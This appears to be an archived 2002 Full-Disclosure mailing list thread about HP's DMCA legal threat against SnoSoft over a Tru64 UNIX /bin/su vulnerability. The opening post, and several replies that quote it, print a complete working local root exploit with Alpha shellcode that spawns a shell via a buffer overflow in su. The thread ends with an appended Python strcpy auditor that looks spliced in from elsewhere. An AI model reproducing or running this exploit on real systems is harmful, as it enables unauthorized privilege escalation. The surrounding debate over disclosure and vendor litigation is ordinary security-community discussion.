Mailing List Archive

OT: Snosoft vs HP
It's interesting to note that the exploit was removed from
SecurityFocus' site. I wonder if HP is going to demand people
remove it from all archives everywhere?

Obligatory exploit:

/*
/bin/su tru64 5.1
works with non-exec stack enabled

stripey is the man

developed at http://www.snosoft.com in the cerebrum labs

phased
phased at mail.ru
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h> /* bzero() */
#include <unistd.h>

char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
"\x12\x14\x02\x42" /* addq $16,16,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\x12\x94\x09\x42" /* addq $16,76,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
"\xf7\xff\x1f\xd2" /* bsr $16,-32 */
"\x10\x04\xff\x47" /* clr $16 */
"\x11\x14\xe3\x43" /* addq $31,24,$17 */
"\x20\x35\x20\x42" /* subq $17,1,$0 */
"\xff\xff\xff\xff" /* callsys ( disguised ) */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */

/* shellcode by Taeho Oh */

int main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";

bzero(&buffer, 8239);
bzero(&payload, 15200);

for (i=0;i<8233;i++)
buffer[i] = 0x41;

/* 0x140010401 */

buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;

for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}

for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];

printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));

execl("/usr/bin/su", "su", buffer, payload, (char *)0);

return 1; /* only reached if execl() fails */
}
Re: OT: Snosoft vs HP
What is even more interesting than that is the fact that a billion dollar
company like HP/Compaq would be stupid enough to try to muscle a small
company with an argument that they know absolutely nothing about. Would
anyone with a legal background like to comment on the legal letter they sent
us, which is now up on slashdot, because it seems kind of ridiculous to me and
obvious that the DMCA was never in a million years meant to be used in this
manner:

http://slashdot.org/comments.pl?sid=37074&cid=3987114

If they did somehow manage to win this kind of a suit it would put everyone
who publishes security research at the risk of being on the wrong end of
million dollar suits, being held liable for all damage done by those with
malicious intent, even though most of us have no such intent.

-sert


On Wednesday 31 July 2002 12:26 pm, ATD wrote:
> What is even more interesting is that this issue has been known for
> quite a while, yet no one did anything about it.
>
>
> Adriel
>
> On Wed, 2002-07-31 at 12:22, Len Rose wrote:
> > It's interesting to note that the exploit was removed from
> > SecurityFocus' site. I wonder if HP is going to demand people
> > remove it from all archives everywhere?
> >
> > Obligatory exploit:
> >
> > /*
> > /bin/su tru64 5.1
> > works with non-exec stack enabled
> >
> > stripey is the man
> >
> > developed at http://www.snosoft.com in the cerebrum labs
> >
> > phased
> > phased at mail.ru
> > */
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <unistd.h>
> >
> > char shellcode[]=
> > "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> > "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
> > "\x12\x14\x02\x42" /* addq $16,16,$18 */
> > "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> > "\x12\x94\x09\x42" /* addq $16,76,$18 */
> > "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> > "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
> > "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
> > "\xfc\xff\x30\xb2" /* stl $17,-4($16) */
> > "\xf7\xff\x1f\xd2" /* bsr $16,-32 */
> > "\x10\x04\xff\x47" /* clr $16 */
> > "\x11\x14\xe3\x43" /* addq $31,24,$17 */
> > "\x20\x35\x20\x42" /* subq $17,1,$0 */
> > "\xff\xff\xff\xff" /* callsys ( disguised ) */
> > "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> > "\x31\x15\xd8\x43" /* subq $30,192,$17 */
> > "\x12\x04\xff\x47" /* clr $18 */
> > "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
> > "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
> > "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
> > "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
> > "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
> > "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
> > "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
> > "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
> > "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
> > "\x13\x94\xe7\x43" /* addq $31,60,$19 */
> > "\x20\x35\x60\x42" /* subq $19,1,$0 */
> > "\xff\xff\xff\xff"; /* callsys ( disguised ) */
> >
> > /* shellcode by Taeho Oh */
> >
> > main(int argc, char *argv[]) {
> > int i, j;
> > char buffer[8239];
> > char payload[15200];
> > char nop[] = "\x1f\x04\xff\x47";
> >
> > bzero(&buffer, 8239);
> > bzero(&payload, 15200);
> >
> > for (i=0;i<8233;i++)
> > buffer[i] = 0x41;
> >
> > /* 0x140010401 */
> >
> > buffer[i++] = 0x01;
> > buffer[i++] = 0x04;
> > buffer[i++] = 0x01;
> > buffer[i++] = 0x40;
> > buffer[i++] = 0x01;
> >
> > for (i=0;i<15000;) {
> > for(j=0;j<4;j++) {
> > payload[i++] = nop[j];
> > }
> > }
> >
> > for (i=i,j=0;j<sizeof(shellcode);i++,j++)
> > payload[i] = shellcode[j];
> >
> > printf("/bin/su by phased\n");
> > printf("payload %db\n", strlen(payload));
> > printf("buffer %db\n", strlen(buffer));
> >
> > execl("/usr/bin/su", "su", buffer, payload, 0);
> >
> > }
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Full-Disclosure@lists.netsys.com
> > http://lists.netsys.com/mailman/listinfo/full-disclosure
Re: OT: Snosoft vs HP
We were forced to request removal after being threatened with more legal
action by HP of course. Below is an excerpt from
http://slashdot.org/comments.pl?sid=37074&cid=3987114

-sert

-- cut from corp email --

HP hereby requests that you cooperate with us to remove the buffer
overflow exploit from securityfocus.com and to take all steps necessary
to prevent the further dissemination by SnoSoft and its agents of this
and similar exploits of Tru64 UNIX. If SnoSoft and its members fail to
cooperate with HP, then this will be considered further evidence of
SnoSoft's bad faith. Finally, HP also reserves its right to seek
whatever legal recourse it has against SnoSoft and its members for
monies and damages caused by the posting and any use of the buffer
overflow exploit

--end cut ---

On Wednesday 31 July 2002 02:02 pm, Blue Boar wrote:
> On Wed, 31 Jul 2002, Len Rose wrote:
> > It's interesting to note that the exploit was removed from
> > SecurityFocus' site. I wonder if HP is going to demand people
> > remove it from all archives everywhere?
>
> It was removed at the request of the Snosoft guys.
>
> BB
>
Re: OT: Snosoft vs HP
What is even more interesting is that this issue has been known for
quite a while, yet no one did anything about it.


Adriel


On Wed, 2002-07-31 at 12:22, Len Rose wrote:
>
> It's interesting to note that the exploit was removed from
> SecurityFocus' site. I wonder if HP is going to demand people
> remove it from all archives everywhere?
>
> Obligatory exploit:
>
> /*
> /bin/su tru64 5.1
> works with non-exec stack enabled
>
> stripey is the man
>
> developed at http://www.snosoft.com in the cerebrum labs
>
> phased
> phased at mail.ru
> */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
>
> char shellcode[]=
> "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
> "\x12\x14\x02\x42" /* addq $16,16,$18 */
> "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> "\x12\x94\x09\x42" /* addq $16,76,$18 */
> "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
> "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
> "\xfc\xff\x30\xb2" /* stl $17,-4($16) */
> "\xf7\xff\x1f\xd2" /* bsr $16,-32 */
> "\x10\x04\xff\x47" /* clr $16 */
> "\x11\x14\xe3\x43" /* addq $31,24,$17 */
> "\x20\x35\x20\x42" /* subq $17,1,$0 */
> "\xff\xff\xff\xff" /* callsys ( disguised ) */
> "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> "\x31\x15\xd8\x43" /* subq $30,192,$17 */
> "\x12\x04\xff\x47" /* clr $18 */
> "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
> "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
> "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
> "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
> "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
> "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
> "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
> "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
> "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
> "\x13\x94\xe7\x43" /* addq $31,60,$19 */
> "\x20\x35\x60\x42" /* subq $19,1,$0 */
> "\xff\xff\xff\xff"; /* callsys ( disguised ) */
>
> /* shellcode by Taeho Oh */
>
> main(int argc, char *argv[]) {
> int i, j;
> char buffer[8239];
> char payload[15200];
> char nop[] = "\x1f\x04\xff\x47";
>
> bzero(&buffer, 8239);
> bzero(&payload, 15200);
>
> for (i=0;i<8233;i++)
> buffer[i] = 0x41;
>
> /* 0x140010401 */
>
> buffer[i++] = 0x01;
> buffer[i++] = 0x04;
> buffer[i++] = 0x01;
> buffer[i++] = 0x40;
> buffer[i++] = 0x01;
>
> for (i=0;i<15000;) {
> for(j=0;j<4;j++) {
> payload[i++] = nop[j];
> }
> }
>
> for (i=i,j=0;j<sizeof(shellcode);i++,j++)
> payload[i] = shellcode[j];
>
> printf("/bin/su by phased\n");
> printf("payload %db\n", strlen(payload));
> printf("buffer %db\n", strlen(buffer));
>
> execl("/usr/bin/su", "su", buffer, payload, 0);
>
> }
>
>
>
--

-------------------------------------------------------
Secure Network Operations, Inc.| http://www.snosoft.com
Cerebrum Project | cerebrum@snosoft.com
Strategic Reconnaissance Team | recon@snosoft.com
-------------------------------------------------------
RE: OT: Snosoft vs HP
I'm looking forward to seeing more of this novel "why patch when you can sue"
approach. Anybody wanna buy a bunch of Alphas? Cheap? Boo, hiss, and poo on
HP for this juvenile and moronic approach to dealing with an exposure. As I
read the press on this, the vuln has been known since at least spring, yet
still no patch, and when the sploit leaks, these idiots unleash the lawyers.
How lame.

Yes, it leaked through improper channels without a concurrent patch. So? I'm
more disgusted with the fact that it's taken HP this long to fix the vuln. I
guess they fired all the OSF/1 (sorry, Tru64, puke, puke, whatever) people.

I wonder if the Apache Group and Theo's bunch can pull this same swindle.
They both got blindsided by improperly released vulns too, but rather than
kvetch and whine and point fingers, they fixed 'em and moved on.

"Please save me, DMCA! I've been violated! Waaaaah!"






--shawn


> -----Original Message-----
> From: ATD [mailto:simon@snosoft.com]
> Sent: Wednesday, July 31, 2002 11:27
> To: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] OT: Snosoft vs HP
>
>
> What is even more interesting is that this issue has been known for
> quite a while, yet no one did anything about it.
>
>
> Adriel
>
>
> On Wed, 2002-07-31 at 12:22, Len Rose wrote:
> >
> > It's interesting to note that the exploit was removed from
> > SecurityFocus' site. I wonder if HP is going to demand people
> > remove it from all archives everywhere?
> >
> > Obligatory exploit:
> >
> > /*
> > /bin/su tru64 5.1
> > works with non-exec stack enabled
> >
> > stripey is the man
> >
> > developed at http://www.snosoft.com in the cerebrum labs
> >
> > phased
> > phased at mail.ru
> > */
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <unistd.h>
> >
> > char shellcode[]=
> > "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> > "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
> > "\x12\x14\x02\x42" /* addq $16,16,$18 */
> > "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> > "\x12\x94\x09\x42" /* addq $16,76,$18 */
> > "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> > "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
> > "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
> > "\xfc\xff\x30\xb2" /* stl $17,-4($16) */
> > "\xf7\xff\x1f\xd2" /* bsr $16,-32 */
> > "\x10\x04\xff\x47" /* clr $16 */
> > "\x11\x14\xe3\x43" /* addq $31,24,$17 */
> > "\x20\x35\x20\x42" /* subq $17,1,$0 */
> > "\xff\xff\xff\xff" /* callsys ( disguised ) */
> > "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> > "\x31\x15\xd8\x43" /* subq $30,192,$17 */
> > "\x12\x04\xff\x47" /* clr $18 */
> > "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
> > "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
> > "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
> > "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
> > "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
> > "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
> > "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
> > "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
> > "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
> > "\x13\x94\xe7\x43" /* addq $31,60,$19 */
> > "\x20\x35\x60\x42" /* subq $19,1,$0 */
> > "\xff\xff\xff\xff"; /* callsys ( disguised ) */
> >
> > /* shellcode by Taeho Oh */
> >
> > main(int argc, char *argv[]) {
> > int i, j;
> > char buffer[8239];
> > char payload[15200];
> > char nop[] = "\x1f\x04\xff\x47";
> >
> > bzero(&buffer, 8239);
> > bzero(&payload, 15200);
> >
> > for (i=0;i<8233;i++)
> > buffer[i] = 0x41;
> >
> > /* 0x140010401 */
> >
> > buffer[i++] = 0x01;
> > buffer[i++] = 0x04;
> > buffer[i++] = 0x01;
> > buffer[i++] = 0x40;
> > buffer[i++] = 0x01;
> >
> > for (i=0;i<15000;) {
> > for(j=0;j<4;j++) {
> > payload[i++] = nop[j];
> > }
> > }
> >
> > for (i=i,j=0;j<sizeof(shellcode);i++,j++)
> > payload[i] = shellcode[j];
> >
> > printf("/bin/su by phased\n");
> > printf("payload %db\n", strlen(payload));
> > printf("buffer %db\n", strlen(buffer));
> >
> > execl("/usr/bin/su", "su", buffer, payload, 0);
> >
> > }
> >
> >
> >
> --
>
> -------------------------------------------------------
> Secure Network Operations, Inc.| http://www.snosoft.com
> Cerebrum Project | cerebrum@snosoft.com
> Strategic Reconnaissance Team | recon@snosoft.com
> -------------------------------------------------------
>
>
>
Re: OT: Snosoft vs HP
Actually HP was pissed at Theo for what OpenSSH did.

It sounds like HP had to hire back the OSF/1 (oops Mach, oops Ultrix, oops
Tru64) people to make patches for OpenSSH.

Thanks,
Andrew Pinski
Re: OT: Snosoft vs HP
On Wed, 31 Jul 2002, Len Rose wrote:
> It's interesting to note that the exploit was removed from
> SecurityFocus' site. I wonder if HP is going to demand people
> remove it from all archives everywhere?

It was removed at the request of the Snosoft guys.

BB
Re: OT: Snosoft vs HP
In a related note, it looks like cnet.com doesn't list the
original article on any of their main pages... bowing to
advertising pressure, I'm sure.

(the article is still there, but has mysteriously disappeared
while much older stories remain)

http://news.com.com/2100-1023-947325.html
RE: OT: Snosoft vs HP
Funny timing for this message from the government...

http://digitalmass.boston.com/news/2002/07/31/black_hat.html

LAS VEGAS -- A presidential adviser encouraged the nation's top computer security professionals and hackers Wednesday to try to break computer programs, but said they might need protection from the legal wrath of software makers.

...
RE: OT: Snosoft vs HP
Security through litigation:

"Our product is secure, because we will sue you if you say otherwise."

While HP may or may not be legally in the right -- I'll let the lawyers
decide that -- I'm the one who's going to be up at 3AM rebuilding a server some
blackhat crashed. And I don't get paid by the hour. I intend to have a
talk with the IS director about our future acquisition and use of HP
equipment.

-----Original Message-----
From: Andrew Pinski [mailto:pinskia@physics.uc.edu]
Sent: Wednesday, July 31, 2002 12:53 PM
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] OT: Snosoft vs HP


Actually HP was pissed at Theo for what OpenSSH did.

It sounds like HP had to hire back the OSF/1 (oops Mach, oops Ultrix, oops
Tru64) people to make patches for OpenSSH.

Thanks,
Andrew Pinski

Re: OT: Snosoft vs HP
The topic of HP's legal action will be discussed in the vendor
selection meeting for our next bazillion-$ supercomputer (Linux
cluster) purchase.

HP/Compaq is currently rated Not Acceptable. We can't afford the
liability exposure of dealing with a company that acts in this
manner. What if one of our students or users does something that
causes HP to sue the University?

The UC lawyers are gonna hurl when they see the ramifications of this
one.

--tep

--
Tom E. Perrine <tep@SDSC.EDU> | San Diego Supercomputer Center
http://www.sdsc.edu/~tep/ |
RE: OT: Snosoft vs HP
Hey all,

I'm for a general boycott of all things HP until this issue is resolved in
Snosoft's favor.

What do you say? Time for a revolution?

-Dave
RE: OT: Snosoft vs HP
Maybe this will end up like DeCSS and we'll all have to start turning
mirrors up. Can we get someone more photogenic than the 2600 people (no
offense, natch) to go to court this time? I'd hate to see this die on appeal
too. Maybe some young, likeable college kids who give good soundbite... Does
anyone know if any of the American Idol contestants hack?




--shawn



> -----Original Message-----
> From: Len Rose [mailto:len@netsys.com]
> Sent: Wednesday, July 31, 2002 13:36
> To: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] OT: Snosoft vs HP
>
>
>
> In a related note, it looks like cnet.com doesn't list the
> original article on any of their main pages.. bowing to
> advertising pressure, I'm sure.
>
> (the article is still there, but has mysteriously disappeared
> while much older stories remain)
>
> http://news.com.com/2100-1023-947325.html
>
>
>
Re: OT: Snosoft vs HP
On Wed, 31 Jul 2002, Jay D. Dyson wrote:

> I've said it before and I'll say it again: it's about time those
> of us in the security community started to cut the legs out from under
> these corporate behemoths. They've been hammering us long enough with
> these litigious abominations; it's about damned time we fired back.

Amen brother. HP should receive no quarter from anyone in the community
until they apologize, publicly. Discover, publish. Discover, publish.
Simple as that. I think they chose to ignore the problem because they are
dropping the product. Maybe it's just me, but I find that inexcusable. I'm
just grateful that we have this list to discuss things openly.

--
Jonathan Rickman
X Corps Security
http://www.xcorps.net
Re: OT: Snosoft vs HP
>>>>> On Wed, 31 Jul 2002 23:56:38 -0400 (EDT), Jonathan Rickman <jonathan@xcorps.net> said:

JR> On Wed, 31 Jul 2002, Jay D. Dyson wrote:
>> I've said it before and I'll say it again: it's about time those
>> of us in the security community started to cut the legs out from under
>> these corporate behemoths. They've been hammering us long enough with
>> these litigious abominations; it's about damned time we fired back.

JR> Amen brother. HP should receive no quarter from anyone in the community
JR> until they apologize, publicly. Discover, publish. Discover, publish.
JR> Simple as that. I think they chose to ignore the problem because they are
JR> dropping the product. Maybe it's just me, but I find that inexcusable. I'm
JR> just grateful that we have this list to discuss things openly.

This is not the first time that HP has been a specific target. Back in
1996-1997 (IIRC) there was a person or group (SOD?) vowing to release
one HP-UX bug each week, unless HP started cleaning up their act.

It was lots of exploits, lots of pretty crappy coding exposed.

Turns out that if you did a "find" on the HP-UX source code (which had
recently slipped out) for "strcpy()" calls, you would get some of the
modules in the order that matched the "HP bug of the week"
announcements.

--
Tom E. Perrine <tep@SDSC.EDU> | San Diego Supercomputer Center
http://www.sdsc.edu/~tep/ |
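The closing observation, that a "find" for strcpy() calls over the HP-UX source predicted the bug-of-the-week list, is a check a reviewer can automate; the same shape of defect (an argv string copied into a fixed stack buffer) is what the /bin/su exploit quoted earlier in this thread relies on. The auditor below is an added example, not code from this thread, from SnoSoft or from HP: it flags unbounded copy calls whose destination is a fixed-size char array, and runs over a constructed C snippet (not Tru64 su source) that shows the pattern.

```python
import re

# Calls that copy with no bound on the destination; the value is the index
# of the destination argument, so memcpy-style calls can be added later.
UNBOUNDED_CALLS = {"strcpy": 0, "strcat": 0, "sprintf": 0, "gets": 0}

# Fixed-size char arrays with a literal size ("char user[32];"); sizes given
# by a macro are not tracked, so such destinations report as unknown.
ARRAY_DECL = re.compile(r"\bchar\s+(\w+)\s*\[\s*(\d+)\s*\]")
CALL = re.compile(r"\b(" + "|".join(UNBOUNDED_CALLS) + r")\s*\(([^;]*)\)")


def split_args(arglist):
    """Split on top-level commas (a triage heuristic, not a C parser)."""
    args, depth, cur = [], 0, ""
    for ch in arglist:
        if ch == "," and depth == 0:
            args.append(cur.strip())
            cur = ""
            continue
        depth += (ch == "(") - (ch == ")")
        cur += ch
    if cur.strip():
        args.append(cur.strip())
    return args


def audit(source):
    """Findings for unbounded copies; dest_size is None for untracked dests."""
    sizes, findings = {}, []
    for lineno, line in enumerate(source.splitlines(), 1):
        code = line.split("//")[0]  # drop line comments
        for name, size in ARRAY_DECL.findall(code):
            sizes[name] = int(size)
        for m in CALL.finditer(code):
            func, args = m.group(1), split_args(m.group(2))
            idx = UNBOUNDED_CALLS[func]
            dest = args[idx] if idx < len(args) else ""
            ident = re.match(r"\w+", dest)
            findings.append({
                "line": lineno,
                "call": func,
                "dest": ident.group(0) if ident else dest,
                "dest_size": sizes.get(ident.group(0)) if ident else None,
            })
    return findings


# Constructed sample (not Tru64 su source): an argv string copied into a
# fixed stack buffer, the same shape of defect the exploit above relies on.
SAMPLE_C = """\
#include <string.h>
int main(int argc, char *argv[]) {
    char user[32];
    char msg[128];
    if (argc > 1)
        strcpy(user, argv[1]);      /* unbounded copy of an argv string */
    strncpy(msg, user, sizeof msg - 1);
    sprintf(msg, "su: %s", user);   /* no bound on the formatted length */
    return 0;
}
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_C):
        print(f'line {f["line"]}: {f["call"]} into {f["dest"]} '
              f'(size {f["dest_size"] or "unknown"})')
```

The bounded strncpy() on line 7 of the sample is not reported; only the strcpy() into user[32] and the sprintf() into msg[128] are, which is exactly the list a reviewer would want to walk first.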